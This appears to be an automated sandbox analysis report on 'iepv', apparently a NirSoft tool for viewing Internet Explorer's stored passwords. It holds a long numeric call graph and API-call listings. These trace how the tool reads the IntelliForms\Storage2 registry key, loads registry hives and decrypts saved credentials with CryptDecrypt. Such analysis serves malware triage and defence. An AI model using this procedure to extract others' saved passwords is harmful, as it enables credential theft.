4858->4843 4859->4858 4861 404037 SendMessageA 4859->4861 4861->4859 4862->4708 4863->4710 4865 40c8a3 FreeLibrary 4864->4865 4866 40c8c6 LoadLibraryA 4865->4866 4867 40c8f2 4866->4867 4868 40c8d8 GetProcAddress 4866->4868 4870 40c8a3 FreeLibrary 4867->4870 4868->4867 4869 40c8fc 4868->4869 4872 40c90c 4869->4872 4873 40c8a3 FreeLibrary 4869->4873 4871 40c8f7 4870->4871 4871->4710 4872->4710 4874 40c91a 4873->4874 4874->4710 4876 40c8b9 4875->4876 4877 40c8ae FreeLibrary 4875->4877 4876->4710 4877->4876 4925 4058e3 4878->4925 4880 402669 4881 402698 4880->4881 4883 40c8ba 3 API calls 4880->4883 4881->4710 4882 402475 4882->4880 4884 4024c7 memset memset 4882->4884 4886 4025f7 4882->4886 4888 402688 4883->4888 4928 405780 4884->4928 4885 402652 5032 405f72 free free 4885->5032 4886->4885 4889 402654 4886->4889 4890 40260a 4886->4890 4888->4881 5033 40c974 4888->5033 4978 4065c1 4889->4978 4998 40269f 4890->4998 4895 402541 4991 405918 _mbscpy 4895->4991 4896 402557 4932 406165 4896->4932 4901 40c91f FreeLibrary 4901->4881 4906 4025da 4943 406f24 4906->4943 4908 40257f memset 4910 4025a3 4908->4910 4910->4906 4914 405f98 7 API calls 4910->4914 4994 405ed3 4910->4994 4913 4060d5 free 4913->4886 4914->4910 5422 4085dd ??2@YAPAXI 4915->5422 4917 409d17 4918 409d6e 4917->4918 4919 409d2e strlen 4917->4919 4921 409d82 _mbsicmp _mbsicmp 4918->4921 4924 409ddc 4918->4924 4919->4918 4920 409d3a atoi 4919->4920 4922 409d4b 4920->4922 4921->4918 4922->4712 4923 40559b strlen strlen _memicmp 4923->4924 4924->4922 4924->4923 4926 4058f2 GetVersionExA 4925->4926 4927 405903 4925->4927 4926->4927 4927->4882 5037 40576e GetModuleFileNameA 4928->5037 4930 405786 strlen 4931 40251e strlen strlen 4930->4931 4931->4895 4931->4896 5038 405476 CreateFileA 4932->5038 4934 406172 4935 40256e 4934->4935 4936 40617a GetFileSize 4934->4936 4935->4906 4935->4908 4937 4060d5 free 4936->4937 4938 40618b 4937->4938 4939 40609f 4 API calls 4938->4939 4940 406194 4939->4940 5039 405c7e ReadFile 4940->5039 4942 40619d CloseHandle 4942->4935 4944 406f31 4943->4944 4945 406ff2 4944->4945 4946 406f49 memset strlen strlen 4944->4946 5040 405f72 free free 4945->5040 4947 406fa4 RegLoadKeyA 4946->4947 4948 406f8d 4946->4948 4952 406fd0 RegOpenKeyExA 4947->4952 4953 4025ee 4947->4953 4951 405918 4 API calls 4948->4951 4951->4947 5072 4033b4 strlen strlen 4952->5072 4953->4913 4954 407002 5041 405f72 free free 4954->5041 4957 40700a 5042 405f72 free free 4957->5042 4959 407012 4960 4060d5 free 4959->4960 4961 40701a 4960->4961 5043 406ac2 memset 4961->5043 4963 40704e 5051 406b85 4963->5051 4965 40701f 4965->4963 5084 40603b 4965->5084 4969 40712a 4969->4953 4970 407140 RegCloseKey RegUnLoadKeyA 4969->4970 4970->4953 4971 40711f 4972 40331c 7 API calls 4971->4972 4972->4969 4973 407095 MultiByteToWideChar _wcslwr 5089 406dfb 4973->5089 4976 40705c 4976->4969 4976->4971 4976->4973 4977 406dfb 97 API calls 4976->4977 4977->4976 5340 402978 4978->5340 4983 406609 wcslen 4984 406775 4983->4984 4989 40663c 4983->4989 5347 4029f3 4984->5347 4985 40664a wcsncmp 4985->4989 4986 4032f0 3 API calls 4986->4989 4987 4066c1 memset 4988 4066e6 memcpy wcschr 4987->4988 4987->4989 4988->4989 4989->4984 4989->4985 4989->4986 4989->4987 4989->4988 4990 40675a LocalFree 4989->4990 4990->4989 5350 4054ca strlen 4991->5350 4995 405ee6 4994->4995 4996 405eea 4994->4996 4995->4910 4996->4995 4997 405f15 memcpy 4996->4997 4997->4995 5354 401347 4998->5354 5000 4026c7 5001 402616 5000->5001 5002 4026cb _mbscpy 5000->5002 5003 402c18 5001->5003 5002->5001 5004 4033b4 9 API calls 5003->5004 5005 402c40 6 API calls 5004->5005 5006 402cdc strlen strlen 5005->5006 5007 402cc9 5005->5007 5010 402d06 5006->5010 5011 402d19 strlen strlen 5006->5011 5008 405918 4 API calls 5007->5008 5008->5006 5012 405918 4 API calls 5010->5012 5014 402d43 5011->5014 5015 402d56 strlen strlen 5011->5015 5012->5011 5016 405918 4 API calls 5014->5016 5018 402d80 5015->5018 5020 402d93 5015->5020 5016->5015 5019 405918 4 API calls 5018->5019 5019->5020 5367 402ba7 memset 5020->5367 5023 402ba7 107 API calls 5024 402dc8 5023->5024 5025 402ba7 107 API calls 5024->5025 5026 402dde 5025->5026 5027 402ba7 107 API calls 5026->5027 5028 40262e 5027->5028 5029 40337e 5028->5029 5030 403390 5029->5030 5031 403384 CryptReleaseContext 5029->5031 5030->4885 5031->5030 5032->4880 5035 40c996 5033->5035 5034 402691 5034->4901 5035->5034 5036 40ca60 CoTaskMemFree 5035->5036 5036->5035 5037->4930 5038->4934 5039->4942 5040->4954 5041->4957 5042->4959 5044 406b22 5043->5044 5045 406af3 5043->5045 5103 40cef4 5044->5103 5126 40ccaf 5045->5126 5048 406b01 5114 406a29 5048->5114 5190 405f72 free free 5051->5190 5053 406b9f RegOpenKeyExA 5054 406bc2 5053->5054 5055 406cc3 5053->5055 5056 40609f 4 API calls 5054->5056 5069 40331c 5055->5069 5057 406bd7 memset 5056->5057 5191 4060ee 5057->5191 5060 406cba RegCloseKey 5060->5055 5061 406c2b 5062 406c34 _strupr 5061->5062 5063 405f98 7 API calls 5062->5063 5064 406c52 5063->5064 5065 405f98 7 API calls 5064->5065 5066 406c66 memset 5065->5066 5067 4060ee 5066->5067 5068 406c95 RegEnumValueA 5067->5068 5068->5060 5068->5062 5070 403321 7 API calls 5069->5070 5071 40337d 5069->5071 5070->5071 5071->4976 5073 4033fc 5072->5073 5074 4033f3 5072->5074 5193 405759 GetFileAttributesA 5073->5193 5075 405918 4 API calls 5074->5075 5075->5073 5077 403409 5078 403445 5077->5078 5079 40340e strlen strlen 5077->5079 5078->4945 5080 40342b 5079->5080 5081 403438 5079->5081 5082 405918 4 API calls 5080->5082 5194 405759 GetFileAttributesA 5081->5194 5082->5081 5195 40605c 5084->5195 5087 406058 5087->4965 5088 405f98 7 API calls 5088->5087 5090 40331c 7 API calls 5089->5090 5091 406e12 5090->5091 5092 406e37 wcslen 5091->5092 5093 406f13 wcslen 5091->5093 5094 40331c 7 API calls 5092->5094 5093->4976 5096 406e4f 5094->5096 5095 406f09 5098 40331c 7 API calls 5095->5098 5096->5095 5097 40331c 7 API calls 5096->5097 5099 406e88 5097->5099 5098->5093 5099->5095 5100 406ea5 memset 5099->5100 5101 406ecb 5100->5101 5199 406d3e 5101->5199 5104 40cec5 2 API calls 5103->5104 5105 40cf03 5104->5105 5106 40cf0d 5105->5106 5107 40cf1f memset RegOpenKeyExA 5105->5107 5110 4058e3 GetVersionExA 5106->5110 5108 40cf58 5107->5108 5109 40cf7c _mbscpy 5107->5109 5133 40cc83 RegQueryValueExA 5108->5133 5112 40cf12 5109->5112 5110->5112 5112->5048 5135 40639c 5114->5135 5117 406ab2 5157 406491 5117->5157 5121 406a7f _strcmpi 5123 406a96 5121->5123 5124 406a5e 5121->5124 5122 406a29 34 API calls 5122->5124 5160 406914 5123->5160 5124->5117 5124->5121 5124->5122 5143 406361 5124->5143 5147 4063f9 5124->5147 5189 40cc6a RegOpenKeyExA 5126->5189 5128 40cccc 5129 40ccf5 5128->5129 5130 40cc83 RegQueryValueExA 5128->5130 5129->5048 5131 40cce5 RegCloseKey 5130->5131 5131->5129 5134 40cca6 RegCloseKey 5133->5134 5134->5109 5136 406491 FindClose 5135->5136 5137 4063a7 5136->5137 5138 4056de 2 API calls 5137->5138 5139 4063bb strlen strlen 5138->5139 5140 4063e4 5139->5140 5141 4063eb 5139->5141 5142 405918 4 API calls 5140->5142 5141->5124 5142->5141 5144 40636b strcmp 5143->5144 5146 406393 5143->5146 5145 406382 strcmp 5144->5145 5144->5146 5145->5146 5146->5124 5148 406404 FindFirstFileA 5147->5148 5149 406425 FindNextFileA 5147->5149 5150 406440 5148->5150 5151 406447 strlen strlen 5149->5151 5152 40643b 5149->5152 5150->5151 5155 406480 5150->5155 5154 406477 5151->5154 5151->5155 5153 406491 FindClose 5152->5153 5153->5150 5156 405918 4 API calls 5154->5156 5155->5124 5156->5155 5158 4064a4 5157->5158 5159 40649a FindClose 5157->5159 5158->4965 5159->5158 5161 40d740 5160->5161 5162 406921 CreateFileA 5161->5162 5163 406a23 5162->5163 5164 406945 5162->5164 5163->5124 5178 405cbc SetFilePointer 5164->5178 5167 406962 GetFileSize 5168 406a1c CloseHandle 5167->5168 5174 40697e 5167->5174 5168->5163 5170 40699a memcpy 5171 4069bf strchr 5170->5171 5170->5174 5173 4069d9 strchr 5171->5173 5171->5174 5172 406a1b 5172->5168 5175 4069e8 5173->5175 5176 4069ea _strlwr 5173->5176 5174->5170 5174->5171 5174->5172 5181 406883 5174->5181 5175->5176 5177 40603b 8 API calls 5176->5177 5177->5174 5188 405c7e ReadFile 5178->5188 5180 405cdd 5180->5167 5180->5168 5182 405cbc 2 API calls 5181->5182 5183 406895 _memicmp 5182->5183 5184 4068a9 memcpy 5183->5184 5187 4068e2 5183->5187 5185 4068c3 5184->5185 5186 405cbc 2 API calls 5185->5186 5186->5187 5187->5174 5188->5180 5189->5128 5190->5053 5192 4060f4 RegEnumValueA 5191->5192 5192->5060 5192->5061 5193->5077 5194->5078 5196 406062 5195->5196 5197 40606b strcmp 5196->5197 5198 406047 5196->5198 5197->5196 5197->5198 5198->5087 5198->5088 5200 40605c strcmp 5199->5200 5202 406d51 5200->5202 5201 406df5 5201->5095 5202->5201 5203 406d8b wcslen 5202->5203 5204 406db3 5203->5204 5205 406dc4 5203->5205 5211 403c66 memcmp 5204->5211 5229 4032f0 5205->5229 5208 406dec LocalFree 5208->5201 5209 406dc2 5209->5201 5209->5208 5232 406ccd 5209->5232 5212 403cb0 memset memset 5211->5212 5213 403ea6 5211->5213 5237 403923 memset _snprintf 5212->5237 5213->5209 5216 403d03 memset memset MultiByteToWideChar MultiByteToWideChar 5250 40381f 5216->5250 5223 403e4a LocalAlloc 5224 403eba GetLastError 5223->5224 5225 403e5b 5223->5225 5224->5213 5282 40369a 5225->5282 5228 403eb3 LocalFree 5228->5224 5333 40329e 5229->5333 5231 4032f8 5231->5209 5233 406ce5 5232->5233 5234 406d37 5232->5234 5233->5234 5235 406cf0 wcslen 5233->5235 5234->5208 5235->5234 5236 406d09 wcslen 5235->5236 5236->5233 5238 40639c 9 API calls 5237->5238 5245 4039da 5238->5245 5239 4063f9 9 API calls 5239->5245 5240 406361 2 API calls 5240->5245 5241 406491 FindClose 5242 403a71 5241->5242 5242->5213 5242->5216 5243 4039eb strlen strlen 5243->5245 5244 405918 4 API calls 5244->5245 5245->5239 5245->5240 5245->5243 5245->5244 5247 403a4c 5245->5247 5249 403a4a 5245->5249 5288 405759 GetFileAttributesA 5245->5288 5248 4056de 2 API calls 5247->5248 5248->5249 5249->5241 5289 403391 5250->5289 5257 403a7b 5309 405476 CreateFileA 5257->5309 5259 403a94 5260 403aa0 GetFileSize 5259->5260 5261 403c4d GetLastError 5259->5261 5262 403ab6 memset 5260->5262 5263 403c37 CloseHandle 5260->5263 5273 403c22 5261->5273 5310 405c7e ReadFile 5262->5310 5263->5273 5265 403adf CloseHandle memset memcpy 5311 40387e 5265->5311 5267 403b3a 5268 40387e 14 API calls 5267->5268 5269 403b55 memset memset 5268->5269 5270 403b90 memcpy 5269->5270 5269->5273 5271 403bbf 5270->5271 5272 40345f 6 API calls 5271->5272 5272->5273 5273->5213 5274 403635 5273->5274 5319 4036f8 5274->5319 5277 403695 memcmp 5277->5213 5277->5223 5278 403668 CryptHashData 5331 40344b 5278->5331 5279 40365c CryptHashData 5279->5278 5283 4036f8 16 API calls 5282->5283 5284 4036b0 5283->5284 5285 4036f0 memcpy CryptDecrypt 5284->5285 5286 4036bc CryptHashData 5284->5286 5287 4036cd CryptDeriveKey CryptDestroyHash 5284->5287 5285->5213 5285->5228 5286->5287 5287->5285 5288->5245 5290 4033b1 wcslen 5289->5290 5291 403397 CryptAcquireContextA 5289->5291 5293 40345f 5290->5293 5291->5290 5292 4033ab GetLastError 5291->5292 5292->5290 5294 403391 CryptAcquireContextA GetLastError 5293->5294 5295 40346e CryptCreateHash 5294->5295 5296 4034c1 wcslen 5295->5296 5297 403486 CryptHashData 5295->5297 5300 40354c 5296->5300 5297->5296 5298 40349a 5297->5298 5299 4034a0 CryptGetHashParam CryptDestroyHash 5298->5299 5299->5296 5301 403391 CryptAcquireContextA GetLastError 5300->5301 5302 403563 memset memset memset memcpy memcpy 5301->5302 5304 4035db 5302->5304 5305 4034c9 7 API calls 5304->5305 5306 40360d 5305->5306 5307 4034c9 7 API calls 5306->5307 5308 403631 5307->5308 5308->5257 5309->5259 5310->5265 5312 403391 CryptAcquireContextA GetLastError 5311->5312 5313 40388e 5312->5313 5314 40354c 12 API calls 5313->5314 5315 4038c4 5314->5315 5316 40390a memcpy 5315->5316 5317 40354c 12 API calls 5315->5317 5318 4038f5 memcpy 5315->5318 5316->5267 5317->5315 5318->5315 5318->5316 5320 403391 CryptAcquireContextA GetLastError 5319->5320 5321 40370a memset memset memset memcpy memcpy 5320->5321 5322 403774 5321->5322 5322->5322 5323 4034c9 7 API calls 5322->5323 5324 4037a4 5323->5324 5325 403391 CryptAcquireContextA GetLastError 5324->5325 5326 4037bc CryptCreateHash 5325->5326 5327 40364a 5326->5327 5328 4037cf CryptHashData 5326->5328 5327->5277 5327->5278 5327->5279 5329 4037e8 CryptHashData 5328->5329 5330 40380d CryptDestroyHash 5328->5330 5329->5327 5329->5330 5330->5327 5332 403455 CryptGetHashParam 5331->5332 5332->5277 5334 4032a3 5333->5334 5335 4032a7 LoadLibraryA 5333->5335 5334->5231 5336 4032cb 5335->5336 5337 4032b8 GetProcAddress 5335->5337 5338 4032ec 5336->5338 5339 4032e2 FreeLibrary 5336->5339 5337->5336 5338->5231 5339->5338 5341 4029f3 FreeLibrary 5340->5341 5342 402980 LoadLibraryA 5341->5342 5343 402991 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5342->5343 5345 4029e0 5342->5345 5344 4029da 5343->5344 5344->5345 5346 4029f3 FreeLibrary 5344->5346 5345->4983 5345->4984 5346->5345 5348 402a03 5347->5348 5349 4029f9 FreeLibrary 5347->5349 5348->4885 5349->5348 5351 4054d5 5350->5351 5352 4054e9 _mbscat 5350->5352 5351->5352 5353 4054dc _mbscat 5351->5353 5352->4896 5353->5352 5363 40539f 5354->5363 5357 401378 5359 40539f strncat 5357->5359 5358 40139a 5358->5000 5360 401382 GetProcAddress 5359->5360 5361 401393 FreeLibrary 5360->5361 5362 40138e 5360->5362 5361->5358 5362->5361 5364 4053ce 5363->5364 5365 401361 LoadLibraryA 5364->5365 5366 4053ac strncat 5364->5366 5365->5357 5365->5358 5366->5364 5368 4056de 2 API calls 5367->5368 5369 402be2 5368->5369 5370 4054ca 2 API calls 5369->5370 5371 402bea 5370->5371 5378 405ce2 strlen strlen 5371->5378 5375 402bf9 5376 402c0b 5375->5376 5382 402ad5 5375->5382 5376->5023 5379 405d02 _mbscat 5378->5379 5380 402bf1 5378->5380 5379->5380 5381 405759 GetFileAttributesA 5380->5381 5381->5375 5383 40639c 9 API calls 5382->5383 5384 402b0c 5383->5384 5385 4063f9 9 API calls 5384->5385 5394 402b17 5385->5394 5386 402b93 5387 406491 FindClose 5386->5387 5388 402b9e 5387->5388 5388->5376 5389 406361 2 API calls 5389->5394 5391 402b40 _strnicmp 5391->5394 5392 4063f9 9 API calls 5392->5394 5393 402ad5 102 API calls 5393->5394 5394->5386 5394->5389 5394->5391 5394->5392 5394->5393 5395 402a08 5394->5395 5410 405476 CreateFileA 5395->5410 5397 402a1c 5398 402a29 GetFileSize 5397->5398 5399 402acc 5397->5399 5400 402a42 ??2@YAPAXI 5398->5400 5401 402ac3 CloseHandle 5398->5401 5399->5394 5411 405c7e ReadFile 5400->5411 5401->5399 5403 402a58 5404 402abc ??3@YAXPAX 5403->5404 5405 402a5f memcmp 5403->5405 5404->5401 5406 402a86 5405->5406 5407 402a8d memcmp 5405->5407 5412 40326a 5406->5412 5407->5404 5407->5406 5410->5397 5411->5403 5413 402ab9 5412->5413 5414 403273 5412->5414 5413->5404 5416 403207 5414->5416 5417 403c66 80 API calls 5416->5417 5418 40323b 5417->5418 5419 403256 5418->5419 5420 4031b2 95 API calls 5418->5420 5419->5413 5421 40324b LocalFree 5420->5421 5421->5419 5425 40860f 5422->5425 5426 408656 ??3@YAXPAX 5422->5426 5425->5426 5427 4085a2 5425->5427 5426->4917 5428 4085cf 5427->5428 5430 4085b4 5427->5430 5431 404495 SendMessageA 5428->5431 5430->5425 5432 4044c3 5431->5432 5432->5430 5433->4726 5434->4733 5436 408d03 5435->5436 5440 408cbf 5435->5440 5456 4054a8 strlen WriteFile 5436->5456 5438 408d11 5438->4734 5439 4054a8 strlen WriteFile 5439->5440 5440->5436 5440->5439 5442 409332 5441->5442 5449 409233 5441->5449 5457 4054a8 strlen WriteFile 5442->5457 5444 409340 5444->4740 5445 40925d strchr 5446 40926b strchr 5445->5446 5445->5449 5446->5449 5447 406115 7 API calls 5447->5449 5448 4054a8 strlen WriteFile 5448->5449 5449->5442 5449->5445 5449->5447 5449->5448 5450 4060d5 free 5449->5450 5450->5449 5452 405504 5451->5452 5453 4054fc GetLastError 5451->5453 5458 4053f1 5452->5458 5453->5452 5456->5438 5457->5444 5459 405425 FormatMessageA 5458->5459 5460 40540e LoadLibraryExA 5458->5460 5462 405463 _mbscpy 5459->5462 5463 40543e strlen 5459->5463 5460->5459 5461 405420 5460->5461 5461->5459 5466 405472 sprintf MessageBoxA 5462->5466 5464 405458 LocalFree 5463->5464 5465 40544b _mbscpy 5463->5465 5464->5466 5465->5464 5466->4737 5467->4767 5468->4769 5469->4771 4377 40ce24 FindResourceA 4378 40ce3d SizeofResource 4377->4378 4381 40ce67 4377->4381 4379 40ce4e LoadResource 4378->4379 4378->4381 4380 40ce5c LockResource 4379->4380 4379->4381 4380->4381 4383 40ceaa EnumResourceNamesA

                                        Executed Functions

                                        Function 0040BFA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?), ref: 0040BFAF
                                          • Part of subcall function 0040BF6B: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040BF81
                                        • GetLastError.KERNEL32(00000000), ref: 0040BFC1
                                        • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040BFE1
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0040BFEF
                                        • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040C015
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0040C026
                                        • GetLastError.KERNEL32(00000000), ref: 0040C028
                                        • CloseHandle.KERNELBASE(?), ref: 0040C033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$ErrorLast$AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
                                        • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA
                                        • API String ID: 2436455536-3194204137
                                        • Opcode ID: 4f6d9428a8150541444a387d4d71cb4677097e3ff327b2a2aefc8e3eb35eaedb
                                        • Instruction ID: 4a9456cab663dd16435ec649672564a535132417db7f97ed96ae019cfbe850c8
                                        • Opcode Fuzzy Hash: 4f6d9428a8150541444a387d4d71cb4677097e3ff327b2a2aefc8e3eb35eaedb
                                        • Instruction Fuzzy Hash: CA119E7250021AEBDB10ABE5CD899AE7AACEF04384F004436FA01F3291D778DD548BA8
                                        Function 00406B85 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F75
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F7D
                                        • RegOpenKeyExA.KERNELBASE(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00020019,?,00000000,?), ref: 00406BB4
                                          • Part of subcall function 0040609F: free.MSVCRT ref: 004060AE
                                        • memset.MSVCRT ref: 00406BF4
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 00406C1D
                                        • _strupr.MSVCRT ref: 00406C3B
                                          • Part of subcall function 00405F98: strlen.MSVCRT ref: 00405FA9
                                          • Part of subcall function 00405F98: free.MSVCRT ref: 00405FCC
                                          • Part of subcall function 00405F98: free.MSVCRT ref: 00405FEF
                                          • Part of subcall function 00405F98: memcpy.MSVCRT(00000002,004069FD,000000FF,?,00000001,00000000,?,00406058,00000000,00000000,004069FD), ref: 0040600F
                                        • memset.MSVCRT ref: 00406C81
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?,?,?,000000FF), ref: 00406CAC
                                        • RegCloseKey.ADVAPI32(?), ref: 00406CBD
                                        Strings
                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00406BAE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$EnumValuememset$CloseOpen_struprmemcpystrlen
                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 2511307296-680441574
                                        • Opcode ID: 0b3aa524db69a8448af26164002a83135ebc79bddcf20ee1b12d273adf7cfa70
                                        • Instruction ID: 9e46696cd099a03c749b7fc8e4f1fd7132345e4112eec0b4d2b1eb9bd22262da
                                        • Opcode Fuzzy Hash: 0b3aa524db69a8448af26164002a83135ebc79bddcf20ee1b12d273adf7cfa70
                                        • Instruction Fuzzy Hash: A841F7B2D0011DAFDB10DF99DD82DEEBBBCEF08344F10406AB619F2191D674AA558FA4
                                        Function 004063F9 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 417 4063f9-406402 418 406404-406423 FindFirstFileA 417->418 419 406425-406439 FindNextFileA 417->419 420 406440-406445 418->420 421 406447-406475 strlen * 2 419->421 422 40643b call 406491 419->422 420->421 424 40648a-406490 420->424 425 406484 421->425 426 406477-406482 call 405918 421->426 422->420 427 406487-406489 425->427 426->427 427->424
                                        APIs
                                        • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,00402B17,?,?,?,?), ref: 0040640F
                                        • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,00402B17,?,?,?,?), ref: 0040642D
                                        • strlen.MSVCRT ref: 0040645D
                                        • strlen.MSVCRT ref: 00406465
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileFindstrlen$FirstNext
                                        • String ID:
                                        • API String ID: 379999529-0
                                        • Opcode ID: a2f68e0131ad00fe1563c1fc84e975f570fd1c3ea5ef582d6e09f883641bc239
                                        • Instruction ID: d61fbb18d3c70a5b6ff45dc066800e2bd6bd94eafa4c712f38055f66edc6061f
                                        • Opcode Fuzzy Hash: a2f68e0131ad00fe1563c1fc84e975f570fd1c3ea5ef582d6e09f883641bc239
                                        • Instruction Fuzzy Hash: 1B11CEB24042059FD3149B68D844ADFB3DCEB44329F214A3FF45AE31C0EB38A9508B69
                                        Function 0040B97B Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 166windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00403F00: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00403F1F
                                          • Part of subcall function 00403F00: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403F31
                                          • Part of subcall function 00403F00: FreeLibrary.KERNEL32(00000000), ref: 00403F45
                                          • Part of subcall function 00403F00: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403F70
                                        • SetErrorMode.KERNELBASE(00008001), ref: 0040B9A3
                                        • GetModuleHandleA.KERNEL32(00000000,0040CEAA,00000000), ref: 0040B9BC
                                        • EnumResourceTypesA.KERNEL32(00000000), ref: 0040B9C3
                                        • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040B9E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: LibraryMessage$AddressEnumErrorFreeHandleLoadModeModuleProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\iepv
                                        • API String ID: 1684816736-3035498568
                                        • Opcode ID: fbde459b227d05bec624e71c6036b1af5cc34eaf2f79f08d0c38d15a99a88878
                                        • Instruction ID: d43f3b1e08da06549c2e0bf94a7206877e006fb5d6485bf630465df68f068d52
                                        • Opcode Fuzzy Hash: fbde459b227d05bec624e71c6036b1af5cc34eaf2f79f08d0c38d15a99a88878
                                        • Instruction Fuzzy Hash: A3515E71508346ABD720AF62DD49A5BBBACFF44344F400C3EF685B21A1D73898158BAE
                                        Function 00406F24 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 170registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00406F62
                                        • strlen.MSVCRT ref: 00406F71
                                        • strlen.MSVCRT ref: 00406F7F
                                        • RegLoadKeyA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,00000000), ref: 00406FC2
                                        • RegOpenKeyExA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,00000000,00020019,?), ref: 00406FDB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 004070AD
                                        • _wcslwr.MSVCRT ref: 004070BA
                                        • wcslen.MSVCRT ref: 004070D7
